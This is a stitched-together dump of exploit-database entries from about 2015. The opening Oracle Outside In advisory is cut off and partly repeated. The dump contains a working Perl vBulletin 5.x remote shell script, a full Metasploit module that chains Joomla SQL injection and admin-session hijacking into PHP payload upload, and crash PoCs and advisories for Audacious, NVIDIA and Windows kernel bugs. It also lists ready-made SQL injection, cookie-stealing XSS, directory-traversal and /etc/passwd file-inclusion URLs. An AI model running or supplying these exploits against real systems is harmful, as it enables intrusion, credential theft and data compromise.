2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
2015-10-18: Oracle release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
An heap memory corruption occured when Outside In decode (DCTDecode) a PDF with a JPEG that have an invalid “Heigth” value.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-002.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38788.zip
###############################################################################
#####################################################################################
Application: Oracle Outside In
Platforms: Windows
Versions: 8.5.2
CVE: CVE-2015-4878
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-06-09: Francis Provencher of COSIG found the issue;
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
2015-10-18: Oracle release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
A Use-After-Free memory corruption occured when Outside In decode (JBIG2Decode) a stream with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-003.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38789.zip
###############################################################################
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
$user=$response->decoded_content;
chomp($user);
print "\n Target Vulnerable ;)\n";
while($cmd=="exit")
{
print "\n\n$user\$ ";
$cmd=<STDIN>;
chomp($cmd);
if($cmd =~ m/exit/i){exit 0;}
$len=length($cmd);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "\n".$response->decoded_content;
}
}else{print "\ntarget is not Vulnerable\n\n"}
# Exploit Title: Audacious 3.7 ID3 Local Crash PoC
# Date: 11-20-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://audacious-media-player.org/
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
# Version: 3.7
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595
require 'fileutils'
require 'mp3info'
evil = 'A' * 1048576
FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'
Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
mp3.tag.artist = evil
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=515
NVIDIA: Stereoscopic 3D Driver Service Arbitrary Run Key Creation
Platform: Windows, NVIDIA Service Version 7.17.13.5382
Class: Elevation of Privilege, Remote Code Execution
Summary:
The 3D Vision service nvSCPAPISvr.exe installed as part of typical driver installations runs at Local System and has an insecure named pipe server. One of the commands in the server can be used to set an Explorer Run key for the system which would allow a user to get code executing in the session of any other user who logs on to the same machine leading to elevation of privilege. In Windows Domain environments it would also be possible to exploit the vulnerability between machines if the attacker has access to a valid user account on one domain joined machine.
Description:
The NVIDIA Stereoscopic 3D Driver Service exposes the named pipe “stereosvrpipe” which implements a simple command response service. One of the commands (number 2) will write an arbitrary value to a fixed set of two registry keys, one which is specific to NVIDIA (no effort has been made to determine if this could be abused) and also the HKEY_LOCAL_MACHINE explorer Run key. This Run key is inspected when a new copy of the Windows Explorer shell is started, any values are treated as command lines to execute. Therefore any user on the system can create an arbitrary run key entry and get their own commands to execute in the security context of any other user (such as an administrator) who logs into the system to interact with the desktop.
The named pipe is not locked down to prevent abuse, in fact it’s given a NULL DACL which means that any user can open the device, although it can’t be exploited from typical application sandboxes such as Chrome or IE. When the pipe is created no attempt is made to prevent remote access to the pipe (by passing the PIPE_REJECT_REMOTE_CLIENTS) flag. This means that the service can also be exposed to external systems, assuming the client has valid credentials (or is running within a session which can use Integrated Authentication). This is probably most dangerous in a Windows Domain Environment.
Finally the service has a potentially memory corruption issue when handling the registry key path. When reading a string from the named pipe the code doesn’t ensure the string is NUL terminated. Instead it’s passed to a function to verify that the path is prefixed with one of the valid registry keys. The code for this check is roughly:
BOOLEAN is_string_prefixed(char *read_str, char *prefix)
{
int ret = FALSE;
int prefix_len = strlen(prefix);
if ( read_str && strlen(read_str) >= prefix_len )
{
char old_char = read_str[prefix_len];
read_str[prefix_len] = 0;
if ( !_strnicmp(read_str, prefix, prefix_len) )
ret = TRUE;
read_str[prefix_len] = old_char;
}
return ret;
}
If the passed string is not NUL terminated then this code will cause temporary memory corruption. For example if the passed string is exactly the same size as the prefix then the code will write the 0 one character off the end of the allocated buffer. Also if the read string’s size is less than the length of the prefix but the original allocation has non NUL data the zero could be written into another valid block. As the function restores the original value it’s unlikely to be reliably exploitable. However there’s actually no reason to do the overwrite as the code is already using strnicmp which will only check up to the prefix size.
In summary there are at least 4 issues with the service:
1) Service exposes the ability to create an arbitrary system wide run key entry
2) When creating the named pipe the PIPE_REJECT_REMOTE_CLIENTS is not passed meaning it can be connected to remotely to exploit the vulnerability.
3) The pipe has a NULL DACL which allows any user to connect to it
4) The processing of the registry key path has potential for memory corruption.
Proof of Concept:
I’ve provided a proof of concept, in C# which will need to be compiled. You can use the csc compiler which comes with the .NET framework.
Expected Result:
The pipe service can't be connected to or it doesn't write the registry key.
Observed Result:
A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38792.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=516
The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in an ioctl handler. Enabling special on ndis.sys netio.sys and ntoskrnl helps to track down the issue, however it will crashes due to a bad pool header without special pool as well.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38793.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=510
The attached poc crashes 32-bit Windows 7 with a screen resolution of 1024x768 and 32bit color depth. The crash occurs during a memmove opperation while copying the cursor content from unmapped memory. This could potentially be used by an attacker to leak kernel memory.
When reproducing this issue in VMWare, it is necessary to remove VMWare tools. In QEMU the issue reproduces reliably.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38794.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=509
The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32k.sys due to a use-after-free condition. The bug appears to be a race condition between two threads and multiple runs on the PoC might be required to trigger the bug. This is more reliable on systems with multiple cores.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38795.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=505
The attached testcase triggers a use-after-free condition in win32k. The attached debugger output was triggered on Windows 7 with Special Pool enabled on win32k.sys.
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38796.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Joomla Content History SQLi Remote Code Execution",
'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions
3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
component in the core of Joomla. Triggering the SQL injection makes it possible
to retrieve active Super User sessions. The cookie can be used to login to the
Joomla administrator backend. By creating a new template file containing our
payload, remote code execution is made possible.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Asaf Orpani', # Vulnerability discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2015-7857' ], # Admin session hijacking
[ 'CVE', '2015-7297' ], # SQLi
[ 'CVE', '2015-7857' ], # SQLi
[ 'CVE', '2015-7858' ], # SQLi
[ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
[ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 3.x <= 3.4.4', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 23 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
], self.class)
end
def check
# Request using a non-existing table
res = sqli(rand_text_alphanumeric(rand(10)+6))
if res && res.body =~ /`(.*)_ucm_history`/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def sqli( tableprefix )
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions.
sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'option' => 'com_contenthistory',
'view' => 'history',
'list[ordering]' => '',
'item_id' => '1',
'type_id' => '1',
'list[select]' => sql
}
})
return res
end
def exploit
# Request using a non-existing table first, to retrieve the table prefix
res = sqli(rand_text_alphanumeric(rand(10)+6))
if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
table_prefix = $1
print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
else
fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
end
# Retrieve the admin session using our retrieved table prefix
res = sqli("#{table_prefix}_")
if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
auth_cookie_part = $1[0...-1]
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
else
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
end
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php")
})
if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
cookie_begin = $1
print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
else
fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
end
# Modify cookie to authenticated admin
auth_cookie = cookie_begin
auth_cookie << "="
auth_cookie << auth_cookie_part
auth_cookie << ";"
# Authenticated session
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie
})
if res && res.code == 200 && res.body =~ /Administration - Control Panel/
print_status("#{peer} - Successfully authenticated as Administrator")
else
fail_with(Failure::Unknown, "#{peer} - Session failure")
end
# Retrieve template view
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'templates'
}
})
# We try to retrieve and store the first template found
if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
template_id = $1
file_id = $2
else
fail_with(Failure::Unknown, "Unable to retrieve template")
end
filename = rand_text_alphanumeric(rand(10)+6)
# Create file
print_status("#{peer} - Creating file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'task' => 'template.createFile',
'id' => template_id,
'file' => file_id,
},
'vars_post' => {
'type' => 'php',
'name' => filename
}
})
# Grab token
if res && res.code == 303 && res.headers['Location']
location = res.headers['Location']
print_status("#{peer} - Following redirect to [ #{location} ]")
res = send_request_cgi(
'uri' => location,
'method' => 'GET',
'cookie' => auth_cookie
)
# Retrieving template token
if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
end
if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
template_path = $1
print_status("#{peer} - Template path [ #{template_path} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
end
else
fail_with(Failure::Unknown, "#{peer} - Creating file failed")
end
filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
# Inject payload data into file
print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'template',
'id' => template_id,
'file' => filename_base64,
},
'vars_post' => {
'jform[source]' => payload.encoded,
'task' => 'template.apply',
token => '1',
'jform[extension_id]' => template_id,
'jform[filename]' => "/#{filename}.php"
}
})
if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
else
fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
end
# Request payload
register_files_for_cleanup("#{filename}.php")
print_status("#{peer} - Executing payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
'cookie' => auth_cookie
})
end
end
source: https://www.securityfocus.com/bid/62969/info
Mozilla Firefox is prone to a denial-of-service vulnerability because it fails to verify the user supplied input.
Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message which is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition.
Firefox 19 is vulnerable; other versions may also be affected.
Note: This issue was previously covered in BID 58857 (Google Chrome and Mozilla Firefox Browser Cookie Verification Security Weakness), but has been moved to its own record for better documentation.
http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st
source: https://www.securityfocus.com/bid/62989/info
BilboPlanet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://example.com/auth.php
(POST - user_id)
user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
source: https://www.securityfocus.com/bid/63004/info
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}
source: https://www.securityfocus.com/bid/63004/info
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/63052/info
Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
This vulnerability affects the following products and versions:
WebLogic Server 10.3.6.0, 12.1.1.0
GlassFish Server 2.1.1, 3.0.1, 3.1.2
JDeveloper 11.1.2.3.0, 11.1.2.4.0, 12.1.2.0.0
http://www.example.com/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf
http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
source: https://www.securityfocus.com/bid/63795/info
TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected.
http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
source: https://www.securityfocus.com/bid/63773/info
Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable.
http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
http://www.example.com/test/admin/index.php